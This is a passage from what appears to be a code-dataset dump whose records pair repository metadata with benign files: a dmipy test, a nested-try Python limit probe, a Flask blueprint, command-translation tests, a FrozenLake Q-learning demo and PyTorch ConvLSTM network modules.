"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">3.四、三、三禁手</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">黑方一步使一个四,两个活三同时形成。</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">4.四、四、三禁手</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">黑方一步使两个四,一个活三同时形成。</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">5.长连禁手</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">黑方一子落下形成连续六子或六子以上相连</span><span style=\" font-family:\'Courier New\'; font-weight:400;\"> </span></p></body></html>"))
| 161.25
| 395
| 0.68972
| 2,265
| 14,835
| 4.51479
| 0.109492
| 0.088011
| 0.108058
| 0.096616
| 0.799237
| 0.795228
| 0.795228
| 0.788578
| 0.779386
| 0.779386
| 0
| 0.062951
| 0.074823
| 14,835
| 91
| 396
| 163.021978
| 0.682113
| 0.012403
| 0
| 0.101266
| 1
| 0.012658
| 0.323772
| 0.074848
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025316
| false
| 0
| 0.012658
| 0
| 0.050633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52a23f5c32c8ab305448dfb863d538592eb521ea
| 2,985
|
py
|
Python
|
dmipy/core/tests/test_multi_tissue_models.py
|
weningerleon/dmipy
|
6eeb4cf803722ba8c7910c67974bff6a6a01a14e
|
[
"MIT"
] | null | null | null |
dmipy/core/tests/test_multi_tissue_models.py
|
weningerleon/dmipy
|
6eeb4cf803722ba8c7910c67974bff6a6a01a14e
|
[
"MIT"
] | null | null | null |
dmipy/core/tests/test_multi_tissue_models.py
|
weningerleon/dmipy
|
6eeb4cf803722ba8c7910c67974bff6a6a01a14e
|
[
"MIT"
] | null | null | null |
from dmipy.signal_models import cylinder_models, gaussian_models
from dmipy.core import modeling_framework
from dmipy.data.saved_acquisition_schemes import (
wu_minn_hcp_acquisition_scheme)
from numpy.testing import assert_almost_equal
# Module-level acquisition scheme. NOTE(review): each test below rebinds a
# local `scheme`, so this module-level instance appears unused in this chunk
# (it also runs at import time) — confirm before relying on it.
scheme = wu_minn_hcp_acquisition_scheme()
def test_multi_tissue_mc_model():
    """Signal fractions of a two-tissue MC model must map onto S0-weighted
    volume fractions (S0 responses are 1. for the ball, 2. for the stick)."""
    acq_scheme = wu_minn_hcp_acquisition_scheme()
    tissue_models = [gaussian_models.G1Ball(), cylinder_models.C1Stick()]
    model = modeling_framework.MultiCompartmentModel(
        models=tissue_models, S0_tissue_responses=[1., 2.])
    # Fix diffusivities and orientation so only the fractions are estimated.
    for name, value in [('C1Stick_1_lambda_par', 1.7e-9),
                        ('G1Ball_1_lambda_iso', 3e-9),
                        ('C1Stick_1_mu', [0., 0.])]:
        model.set_fixed_parameter(name, value)
    signal = model.simulate_signal(
        acq_scheme, {'partial_volume_0': .5, 'partial_volume_1': .5})
    fitted = model.fit(acq_scheme, signal)
    sig_fracts = fitted.fitted_parameters
    vol_fracts = fitted.fitted_multi_tissue_fractions
    vol_norm = fitted.fitted_multi_tissue_fractions_normalized
    # Ball has S0 == 1 so its signal and volume fractions coincide; the
    # stick's signal fraction is twice its volume fraction (S0 == 2).
    assert_almost_equal(sig_fracts['partial_volume_0'],
                        vol_fracts['partial_volume_0'], 2)
    assert_almost_equal(sig_fracts['partial_volume_1'],
                        vol_fracts['partial_volume_1'] * 2., 2)
    assert_almost_equal(vol_norm['partial_volume_0'], 2 / 3., 2)
    assert_almost_equal(vol_norm['partial_volume_1'], 1 / 3., 2)
def test_multi_tissue_mc_sm_model():
    """Same fraction check as test_multi_tissue_mc_model, but the fit uses
    the spherical-mean variant on signal simulated by the full MC model."""
    acq_scheme = wu_minn_hcp_acquisition_scheme()
    tissue_models = [gaussian_models.G1Ball(), cylinder_models.C1Stick()]
    s0_responses = [1., 2.]
    # Generate ground-truth signal with the full multi-compartment model.
    generator = modeling_framework.MultiCompartmentModel(
        models=tissue_models, S0_tissue_responses=s0_responses)
    for name, value in [('C1Stick_1_lambda_par', 1.7e-9),
                        ('G1Ball_1_lambda_iso', 3e-9),
                        ('C1Stick_1_mu', [0., 0.])]:
        generator.set_fixed_parameter(name, value)
    signal = generator.simulate_signal(
        acq_scheme, {'partial_volume_0': .5, 'partial_volume_1': .5})
    # Fit the spherical-mean model (orientation `mu` is not a parameter here).
    sm_model = modeling_framework.MultiCompartmentSphericalMeanModel(
        models=tissue_models, S0_tissue_responses=s0_responses)
    sm_model.set_fixed_parameter('C1Stick_1_lambda_par', 1.7e-9)
    sm_model.set_fixed_parameter('G1Ball_1_lambda_iso', 3e-9)
    fitted = sm_model.fit(acq_scheme, signal)
    sig_fracts = fitted.fitted_parameters
    vol_fracts = fitted.fitted_multi_tissue_fractions
    vol_norm = fitted.fitted_multi_tissue_fractions_normalized
    assert_almost_equal(sig_fracts['partial_volume_0'],
                        vol_fracts['partial_volume_0'], 2)
    assert_almost_equal(sig_fracts['partial_volume_1'],
                        vol_fracts['partial_volume_1'] * 2., 2)
    assert_almost_equal(vol_norm['partial_volume_0'], 2 / 3., 2)
    assert_almost_equal(vol_norm['partial_volume_1'], 1 / 3., 2)
| 39.8
| 79
| 0.743384
| 444
| 2,985
| 4.506757
| 0.15991
| 0.045977
| 0.076462
| 0.035982
| 0.866567
| 0.824588
| 0.806597
| 0.806597
| 0.806597
| 0.784608
| 0
| 0.035346
| 0.156449
| 2,985
| 74
| 80
| 40.337838
| 0.759333
| 0.01407
| 0
| 0.8
| 0
| 0
| 0.135034
| 0
| 0
| 0
| 0
| 0
| 0.15
| 1
| 0.033333
| false
| 0
| 0.066667
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52f2e2e599b587ce9ab034c47086001fcec8a2cc
| 2,147
|
py
|
Python
|
scripts/maxblock.py
|
liwt31/unexpected
|
f973896812ad54494a8644fff431fc5202eaef41
|
[
"MIT"
] | null | null | null |
scripts/maxblock.py
|
liwt31/unexpected
|
f973896812ad54494a8644fff431fc5202eaef41
|
[
"MIT"
] | null | null | null |
scripts/maxblock.py
|
liwt31/unexpected
|
f973896812ad54494a8644fff431fc5202eaef41
|
[
"MIT"
] | null | null | null |
# NOTE(review): intentionally pathological module — 21 nested `try` blocks,
# each with a matching bare `except: pass`, and no other code. Given the
# file name (maxblock.py) this presumably probes the interpreter's limit on
# statically nested blocks (CPython raises "SyntaxError: too many statically
# nested blocks" past its compile-time cap) — confirm the repository's intent
# before "fixing" or reformatting this file; the structure IS the point.
try:
    try:
        try:
            try:
                try:
                    try:
                        try:
                            try:
                                try:
                                    try:
                                        try:
                                            try:
                                                try:
                                                    try:
                                                        try:
                                                            try:
                                                                try:
                                                                    try:
                                                                        try:
                                                                            try:
                                                                                try:
                                                                                    pass
                                                                                except: pass
                                                                            except: pass
                                                                        except: pass
                                                                    except: pass
                                                                except: pass
                                                            except: pass
                                                        except: pass
                                                    except: pass
                                                except: pass
                                            except: pass
                                        except: pass
                                    except: pass
                                except: pass
                            except: pass
                        except: pass
                    except: pass
                except: pass
            except: pass
        except: pass
    except: pass
except: pass
| 48.795455
| 92
| 0.129017
| 64
| 2,147
| 4.328125
| 0.046875
| 0.758123
| 1.061372
| 1.444043
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.851421
| 2,147
| 43
| 93
| 49.930233
| 0.868339
| 0
| 0
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.511628
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 13
|
5e13059baa693d3880349c8edbab3847d47d9076
| 179
|
py
|
Python
|
app/nonlinear_equations/__init__.py
|
sgg10/arsp_solver_api
|
ad1d2f52eea58338d4f26128d5130eb326d529fb
|
[
"MIT"
] | null | null | null |
app/nonlinear_equations/__init__.py
|
sgg10/arsp_solver_api
|
ad1d2f52eea58338d4f26128d5130eb326d529fb
|
[
"MIT"
] | null | null | null |
app/nonlinear_equations/__init__.py
|
sgg10/arsp_solver_api
|
ad1d2f52eea58338d4f26128d5130eb326d529fb
|
[
"MIT"
] | null | null | null |
# Flask blueprint grouping the nonlinear-equation solver endpoints.
from flask import Blueprint
# Every route registered on this blueprint is served under the
# /api/nonlinear_equations/ URL prefix.
nonlinear_equations = Blueprint("nonlinear_equations", __name__, url_prefix='/api/nonlinear_equations/')
# Imported last, and for its side effects only: `routes` attaches handlers to
# the blueprint created above (the usual Flask circular-import workaround).
from app.nonlinear_equations import routes
| 25.571429
| 104
| 0.832402
| 21
| 179
| 6.666667
| 0.571429
| 0.514286
| 0.385714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089385
| 179
| 6
| 105
| 29.833333
| 0.858896
| 0
| 0
| 0
| 0
| 0
| 0.24581
| 0.139665
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
ead0a7af66b46fcc37a136760f849a0280dccce6
| 987
|
py
|
Python
|
test_fena/v1_13/test_xps.py
|
Aquafina-water-bottle/Fena
|
00a2b1dbc6f8abd968c46c637d6ad30d5fcde919
|
[
"MIT"
] | 2
|
2017-07-04T02:27:11.000Z
|
2017-07-08T10:39:54.000Z
|
test_fena/v1_13/test_xps.py
|
Aquafina-water-bottle/Fena
|
00a2b1dbc6f8abd968c46c637d6ad30d5fcde919
|
[
"MIT"
] | 6
|
2018-07-07T11:58:15.000Z
|
2018-07-07T13:01:49.000Z
|
test_fena/v1_13/test_xps.py
|
Aquafina-water-bottle/Fena
|
00a2b1dbc6f8abd968c46c637d6ad30d5fcde919
|
[
"MIT"
] | 1
|
2017-07-24T23:52:43.000Z
|
2017-07-24T23:52:43.000Z
|
from test_fena.test_common import test_cmd
def test_xps():
    """Exercise translation of the shorthand ``xp`` command.

    Each ``test_cmd`` call pairs a shorthand command with the vanilla
    command it should expand to, or asserts that parsing must fail.
    Call order matches the original test exactly.
    """
    # "+"/"-" expand to "xp add" (negated for "-"); "=" expands to "xp set".
    # Default unit is "points"; amount 0 keeps its sign in the "-" form.
    for amount in ("5", "0"):
        test_cmd(f"xp @s + {amount}", f"xp add @s {amount} points")
        test_cmd(f"xp @s - {amount}", f"xp add @s -{amount} points")
        test_cmd(f"xp @s = {amount}", f"xp set @s {amount} points")
    # Negative amounts are rejected for every operator.
    for op in "+-=":
        test_cmd(f"xp @s {op} -10", expect_error=True)
    # Explicit units are passed through unchanged.
    for unit in ("points", "levels"):
        test_cmd(f"xp @s + 5 {unit}", f"xp add @s 5 {unit}")
        test_cmd(f"xp @s - 5 {unit}", f"xp add @s -5 {unit}")
        test_cmd(f"xp @s = 5 {unit}", f"xp set @s 5 {unit}")
    # "<-" queries the current value; only known units are accepted.
    for unit in ("points", "levels"):
        test_cmd(f"xp @s <- {unit}", f"xp get @s {unit}")
    test_cmd("xp @s <- invalid", expect_error=True)
| 35.25
| 55
| 0.571429
| 187
| 987
| 2.877005
| 0.117647
| 0.247212
| 0.301115
| 0.334572
| 0.819703
| 0.760223
| 0.760223
| 0.711896
| 0.711896
| 0.682156
| 0
| 0.04
| 0.240122
| 987
| 27
| 56
| 36.555556
| 0.677333
| 0
| 0
| 0
| 0
| 0
| 0.48783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| true
| 0
| 0.05
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
dc3b9f59a4f114a7cd7a370a341647b4f1412603
| 86
|
py
|
Python
|
brackets/tests/__init__.py
|
pouya-eghbali/brackets
|
09cf908df7e00f84408cdf783373a2d864cad8cc
|
[
"BSD-3-Clause"
] | 16
|
2019-01-02T16:03:47.000Z
|
2022-02-12T16:39:40.000Z
|
brackets/tests/__init__.py
|
pooya-eghbali/brackets
|
09cf908df7e00f84408cdf783373a2d864cad8cc
|
[
"BSD-3-Clause"
] | 2
|
2018-01-25T22:58:26.000Z
|
2018-01-25T23:29:36.000Z
|
brackets/tests/__init__.py
|
pooya-eghbali/brackets
|
09cf908df7e00f84408cdf783373a2d864cad8cc
|
[
"BSD-3-Clause"
] | 2
|
2018-01-26T02:20:05.000Z
|
2018-05-16T17:13:24.000Z
|
import brackets
import brackets.tests.with_codecs
import brackets.tests.with_importer
| 21.5
| 35
| 0.883721
| 12
| 86
| 6.166667
| 0.5
| 0.567568
| 0.513514
| 0.621622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 86
| 3
| 36
| 28.666667
| 0.925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
dc7b93143693f193d79cde14b3dcefa98f6401ec
| 2,873
|
py
|
Python
|
demos/lake.py
|
SmartDataAnalytics/HSP-RL
|
9ba634f1410d067dc5fee88b1b13ced1e3bb508a
|
[
"Apache-2.0"
] | null | null | null |
demos/lake.py
|
SmartDataAnalytics/HSP-RL
|
9ba634f1410d067dc5fee88b1b13ced1e3bb508a
|
[
"Apache-2.0"
] | null | null | null |
demos/lake.py
|
SmartDataAnalytics/HSP-RL
|
9ba634f1410d067dc5fee88b1b13ced1e3bb508a
|
[
"Apache-2.0"
] | null | null | null |
import gym
import sys
import numpy as np
import tensorflow as tf
from gym.envs.registration import register
'''
------------------------- TESTS (Gym framework) -------------------------
'''
# Smoke-test the stock (slippery) FrozenLake environment with fixed seeds.
env = gym.make('FrozenLake-v0')
env.seed(0)
np.random.seed(56776)
print(env.observation_space)
print(env.action_space)
# Q-table: one row per discrete state, one column per discrete action.
q_learning_table = np.zeros([env.observation_space.n, env.action_space.n])
print(q_learning_table)
print(env.render())
# Take each of the four discrete actions once from a fresh reset and render
# the result (action index meanings assumed from gym's FrozenLake — confirm).
s = env.reset()
env.step(0)
env.render()
print('---------')
s = env.reset()
env.step(1)
env.render()
print('---------')
s = env.reset()
env.step(2)
env.render()
print('---------')
s = env.reset()
env.step(3)
env.render()
print('---------')
# NOTE(review): exit(0) terminates the script here — everything below is
# unreachable as written.
exit(0)
# NOTE(review): 'FrozenLakeNotSlippery-v0' is not a stock gym id; it needs a
# prior register(...) call (`register` is imported above but never called in
# this file) — confirm where the registration happens.
env = gym.make('FrozenLakeNotSlippery-v0')
env.seed(0)
np.random.seed(56776)
q_learning_table = np.zeros([env.observation_space.n, env.action_space.n])
# -- hyper --
num_epis = 5000
num_iter = 2000
learning_rate = 0.3
discount = 0.8
# -- training the agent ----
for epis in range(num_epis):
    state = env.reset()
    for iter in range(num_iter):
        # Greedy action plus Gaussian noise for exploration.
        action = np.argmax(q_learning_table[state, :] + np.random.randn(1, 4))
        state_new, reward, done, _ = env.step(action)
        # Standard tabular Q-learning update (learning rate 0.3, gamma 0.8).
        q_learning_table[state, action] = (1 - learning_rate) * q_learning_table[state, action] + \
                                          learning_rate * (reward + discount * np.max(q_learning_table[state_new, :]))
        state = state_new
        if done: break
print(np.argmax(q_learning_table, axis=1))
print(np.around(q_learning_table, 6))
print('-------------------------------')
# visualize no uncertainty: greedy rollout of the learned policy.
s = env.reset()
for _ in range(100):
    action = np.argmax(q_learning_table[s, :])
    state_new, _, done, _ = env.step(action)
    env.render()
    s = state_new
    if done: break
print('-------------------------------')
# Repeat the same training on the slippery variant, fewer episodes/iterations.
env = gym.make('FrozenLake-v0')
env.seed(0)
np.random.seed(56776)
q_learning_table = np.zeros([env.observation_space.n, env.action_space.n])
# -- hyper --
num_epis = 500
num_iter = 200
learning_rate = 0.3
discount = 0.8
# -- training the agent ----
for epis in range(num_epis):
    state = env.reset()
    for iter in range(num_iter):
        action = np.argmax(q_learning_table[state, :] + np.random.randn(1, 4))
        state_new, reward, done, _ = env.step(action)
        q_learning_table[state, action] = (1 - learning_rate) * q_learning_table[state, action] + \
                                          learning_rate * (reward + discount * np.max(q_learning_table[state_new, :]))
        state = state_new
        if done: break
print(np.argmax(q_learning_table, axis=1))
print(np.around(q_learning_table, 6))
print('-------------------------------')
# Greedy rollout of the policy learned on the slippery environment.
s = env.reset()
for _ in range(100):
    action = np.argmax(q_learning_table[s, :])
    state_new, _, done, _ = env.step(action)
    env.render()
    s = state_new
    if done: break
# -- end code --
| 26.118182
| 118
| 0.613296
| 405
| 2,873
| 4.162963
| 0.187654
| 0.096085
| 0.149466
| 0.090154
| 0.825623
| 0.816133
| 0.813167
| 0.813167
| 0.759786
| 0.759786
| 0
| 0.027269
| 0.183084
| 2,873
| 109
| 119
| 26.357798
| 0.691095
| 0.040724
| 0
| 0.776471
| 0
| 0
| 0.067142
| 0.043886
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0.176471
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dc859f8593b46a157af464459e2b21b728d85a7e
| 15,584
|
py
|
Python
|
models/rnnmodule.py
|
shaochangxu/UMT-MVSNet
|
d502b9f28ae052186b9a92fc0ccd8c8709effd28
|
[
"MIT"
] | 1
|
2021-06-25T13:32:16.000Z
|
2021-06-25T13:32:16.000Z
|
models/rnnmodule.py
|
shaochangxu/UMT-MVSNet
|
d502b9f28ae052186b9a92fc0ccd8c8709effd28
|
[
"MIT"
] | null | null | null |
models/rnnmodule.py
|
shaochangxu/UMT-MVSNet
|
d502b9f28ae052186b9a92fc0ccd8c8709effd28
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch
import numpy as np
from .convlstm import *
from .submodule import *
#from module import *
class FeatNet(nn.Module):
    """2-D feature extractor built from grouped-norm conv blocks.

    A short trunk (conv0_0..conv0_3) feeds two extra dilation branches
    (conv1_*, conv2_*) off the conv0_2 output; the three resulting maps
    are concatenated and fused by a plain 3x3 convolution. Attribute
    names are kept so state_dict keys stay compatible.
    """

    def __init__(self, gn):
        # `gn` is accepted for interface compatibility but is not read here.
        super(FeatNet, self).__init__()
        nf = 8  # base channel width
        # Trunk: 3 -> 16 -> 32 channels, dilation 2 in the middle.
        self.conv0_0 = convgnrelu(3, nf * 2, kernel_size=3, stride=1, dilation=1)
        self.conv0_1 = convgnrelu(nf * 2, nf * 4, kernel_size=3, stride=1, dilation=1)
        self.conv0_2 = convgnrelu(nf * 4, nf * 4, kernel_size=3, stride=1, dilation=2)
        self.conv0_3 = convgnrelu(nf * 4, nf * 4, kernel_size=3, stride=1, dilation=1)
        # Branch fed by conv0_2, dilation 3.
        self.conv1_1 = convgnrelu(nf * 4, nf * 4, kernel_size=3, stride=1, dilation=3)
        self.conv1_2 = convgnrelu(nf * 4, nf * 4, kernel_size=3, stride=1, dilation=1)
        # Branch fed by conv0_2, dilation 4.
        self.conv2_1 = convgnrelu(nf * 4, nf * 4, kernel_size=3, stride=1, dilation=4)
        self.conv2_2 = convgnrelu(nf * 4, nf * 4, kernel_size=3, stride=1, dilation=1)
        # Fusion of the concatenated conv0_3 / conv1_2 / conv2_2 maps.
        self.conv = nn.Conv2d(nf * 12, nf * 4, 3, 1, 1)

    def forward(self, x):
        trunk0 = self.conv0_0(x)
        trunk1 = self.conv0_1(trunk0)
        shared = self.conv0_2(trunk1)        # shared input of both branches
        head = self.conv0_3(shared)
        branch_a = self.conv1_2(self.conv1_1(shared))
        branch_b = self.conv2_2(self.conv2_1(shared))
        return self.conv(torch.cat((head, branch_a, branch_b), 1))
class UNetConvLSTMV4(nn.Module):
    """U-Net-shaped stack of convolutional LSTM cells (variant 4).

    The first (num_layers + 1) / 2 cells form a downsampling encoder
    (MaxPool2d between cells); the remaining cells form a decoder whose
    inputs are upsampled with deConvGnReLU and concatenated with the
    matching encoder output, U-Net style. A final 3x3 conv collapses the
    last hidden map to a single-channel cost map. Per-cell (h, c) state is
    threaded through successive forward() calls by the caller.
    """
    def __init__(self, input_size, input_dim, hidden_dim, kernel_size, num_layers,
                 batch_first=False, bias=True, return_all_layers=False, gn=True):
        # input_size: (height, width) of the full-resolution feature map.
        # input_dim / hidden_dim / kernel_size: per-layer lists (scalars are
        # broadcast to num_layers entries below). num_layers must be odd.
        super(UNetConvLSTMV4, self).__init__()
        self._check_kernel_size_consistency(kernel_size)
        # Make sure that both `kernel_size` and `hidden_dim` are lists having len == num_layers
        kernel_size = self._extend_for_multilayer(kernel_size, num_layers)
        hidden_dim = self._extend_for_multilayer(hidden_dim, num_layers)
        if not len(kernel_size) == len(hidden_dim) == num_layers:
            raise ValueError('Inconsistent list length.')
        self.height, self.width = input_size #feature: height, width)
        self.gn = gn
        print('Training Phase in UNetConvLSTM: {}, {}, gn: {}'.format(self.height, self.width, self.gn))
        self.input_dim = input_dim # input channel
        self.hidden_dim = hidden_dim # output channel [16, 16, 16, 16, 16, 8]
        self.kernel_size = kernel_size # kernel size [[3, 3]*5]
        self.num_layers = num_layers # Unet layer size: must be odd
        self.batch_first = batch_first # TRUE
        self.bias = bias #
        self.return_all_layers = return_all_layers
        #assert self.num_layers % 2 == 1 # Even
        self.down_num = (self.num_layers+1) / 2
        # redefine four UNet-LSTM
        # GPU Memory: 8033MiB
        cell_list = []
        assert self.num_layers % 2 == 1 # num_layers == 7
        # NOTE(review): duplicate of the self.down_num assignment above; harmless.
        self.down_num = (self.num_layers+1) / 2
        # use GN
        for i in range(0, self.num_layers):
            #cur_input_dim = self.input_dim if i == 0 else self.hidden_dim[i-1]
            # Spatial scale halves per encoder level, then doubles back up the decoder.
            scale = 2**i if i < self.down_num else 2**(self.num_layers-i-1)
            cell_list.append(ConvGnLSTMCell(input_size=(int(self.height/scale), int(self.width/scale)),
            #cell_list.append(ConvLSTMCell(input_size=(int(self.height/scale), int(self.width/scale)),
                                            input_dim=self.input_dim[i],
                                            hidden_dim=self.hidden_dim[i],
                                            kernel_size=self.kernel_size[i],
                                            bias=self.bias))
        self.cell_list = nn.ModuleList(cell_list)
        # Three stride-2 transposed-conv upsamplers, one per decoder level.
        self.deconv_0 = deConvGnReLU(
            16,
            16, #16
            kernel_size=3,
            stride=2,
            padding=1,
            bias=self.bias,
            output_padding=1
        )
        self.deconv_1 = deConvGnReLU(
            16,
            16, #16
            kernel_size=3,
            stride=2,
            padding=1,
            bias=self.bias,
            output_padding=1
        )
        # add one more deeper network
        self.deconv_2 = deConvGnReLU(
            16,
            16, #16
            kernel_size=3,
            stride=2,
            padding=1,
            bias=self.bias,
            output_padding=1
        )
        # Final projection from 8 channels to a 1-channel cost map.
        self.conv_0 = nn.Conv2d(8, 1, 3, 1, padding=1)
    def forward(self, input_tensor, hidden_state=None, idx = 0, process_sq=True):
        """
        Run one recurrent step of the U-shaped ConvLSTM.

        Parameters
        ----------
        input_tensor : torch.Tensor
            Feature map for the current step; ``size(0)`` is the batch size.
        hidden_state : list or None
            Per-cell (h, c) pairs from the previous call; freshly
            initialized when ``idx == 0`` regardless of what is passed.
        idx : int
            Step index; 0 triggers hidden-state initialization.
        process_sq : bool
            When True, run the encoder/decoder path and return
            ``(cost, hidden_state)``. NOTE(review): when False this method
            implicitly returns None — confirm callers never pass False.

        Returns
        -------
        (cost, hidden_state) when ``process_sq`` is True.
        """
        if idx ==0 : # first step: create zeroed per-cell hidden states
            hidden_state = self._init_hidden(batch_size=input_tensor.size(0))
        # NOTE(review): layer_output_list / last_state_list / seq_len are
        # never used below in this variant.
        layer_output_list = []
        last_state_list = []
        seq_len = input_tensor.size(1)
        cur_layer_input = input_tensor
        if process_sq:
            #Encoder: cells 0-3, max-pooling between levels.
            #print(torch.sum(self.hidden_state[0][0]==0))
            h0, c0 = hidden_state[0]= self.cell_list[0](input_tensor=cur_layer_input,
                                                        cur_state=hidden_state[0])
            #self.hidden_state[0] = (h0, c0)
            h0_1 = nn.MaxPool2d((2, 2), stride=2)(h0)
            h1, c1 = hidden_state[1] = self.cell_list[1](input_tensor=h0_1,
                                                         cur_state=hidden_state[1])
            #self.hidden_state[1] = (h1, c1)
            h1_0 = nn.MaxPool2d((2, 2), stride=2)(h1)
            h2, c2 = hidden_state[2] = self.cell_list[2](input_tensor=h1_0,
                                                         cur_state=hidden_state[2])
            h2_0 = nn.MaxPool2d((2, 2), stride=2)(h2)
            h3, c3 = hidden_state[3] = self.cell_list[3](input_tensor=h2_0,
                                                         cur_state=hidden_state[3])
            # Decoder: upsample, concat with the matching encoder output (U-Net skip).
            #self.hidden_state[2] = (h2, c2)
            h3_0 = self.deconv_0(h3) # auto reuse
            h3_1 = torch.cat([h3_0, h2], 1)
            h4, c4 = hidden_state[4] = self.cell_list[4](input_tensor=h3_1,
                                                         cur_state=hidden_state[4])
            #self.hidden_state[3] = (h3, c3)
            h4_0 = self.deconv_1(h4) # auto reuse
            h4_1 = torch.cat([h4_0, h1], 1)
            h5, c5 = hidden_state[5] = self.cell_list[5](input_tensor=h4_1,
                                                         cur_state=hidden_state[5])
            #self.hidden_state[3] = (h3, c3)
            h5_0 = self.deconv_2(h5) # auto reuse
            h5_1 = torch.cat([h5_0, h0], 1)
            h6, c6 = hidden_state[6] = self.cell_list[6](input_tensor=h5_1,
                                                         cur_state=hidden_state[6])
            #self.hidden_state[4] = (h4, c4)
            cost = self.conv_0(h6) # auto reuse
            #cost = F.tanh(cost)
            # output cost
            return cost, hidden_state
    def _init_hidden(self, batch_size):
        # Ask every cell for a zeroed (h, c) pair sized for `batch_size`.
        init_states = []
        for i in range(self.num_layers):
            init_states.append(self.cell_list[i].init_hidden(batch_size))
        return init_states
    @staticmethod
    def _check_kernel_size_consistency(kernel_size):
        # Kernel sizes must be a tuple, or a list containing only tuples.
        if not (isinstance(kernel_size, tuple) or
                (isinstance(kernel_size, list) and all([isinstance(elem, tuple) for elem in kernel_size]))):
            raise ValueError('`kernel_size` must be tuple or list of tuples')
    @staticmethod
    def _extend_for_multilayer(param, num_layers):
        # Broadcast a scalar/single setting to one entry per layer.
        if not isinstance(param, list):
            param = [param] * num_layers
        return param
# input 3D Feature Volume
class UNetConvLSTM(nn.Module):  # input 3D feature volume
    """UNet-shaped ConvLSTM over 2D feature maps (2 pooling / 2 upsampling stages).

    forward() works in two modes: step-by-step (process_sq=True, one feature
    map per call with recurrent state threaded through ``hidden_state``) or
    whole-sequence (process_sq=False, a (b, t, c, h, w) tensor at once).
    """

    def __init__(self, input_size, input_dim, hidden_dim, kernel_size, num_layers,
                 batch_first=False, bias=True, return_all_layers=False, gn=True):
        """
        :param input_size: (height, width) of the input feature map
        :param input_dim: per-layer input channel counts
        :param hidden_dim: per-layer output channel counts, e.g. [16, 16, 16, 16, 8]
        :param kernel_size: per-layer conv kernel sizes, e.g. [(3, 3)] * 5
        :param num_layers: number of ConvLSTM layers; must be odd for the UNet shape
